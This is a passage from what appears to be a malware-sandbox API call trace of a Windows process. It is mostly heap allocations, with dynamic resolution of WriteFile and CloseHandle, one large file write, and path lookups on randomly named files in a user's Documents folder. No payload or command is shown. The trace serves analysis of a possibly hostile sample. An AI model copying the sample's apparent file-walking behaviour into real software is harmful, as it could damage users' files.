Size=0x10) returned 0x9bd420 [0177.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.307] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd948 [0177.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd948, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.307] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.308] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xd24a, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xd24a, lpOverlapped=0x0) returned 1 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.312] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.313] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.313] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.314] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.314] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0177.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.317] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.317] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.317] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpFilePart=0x0) returned 0x4f [0177.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 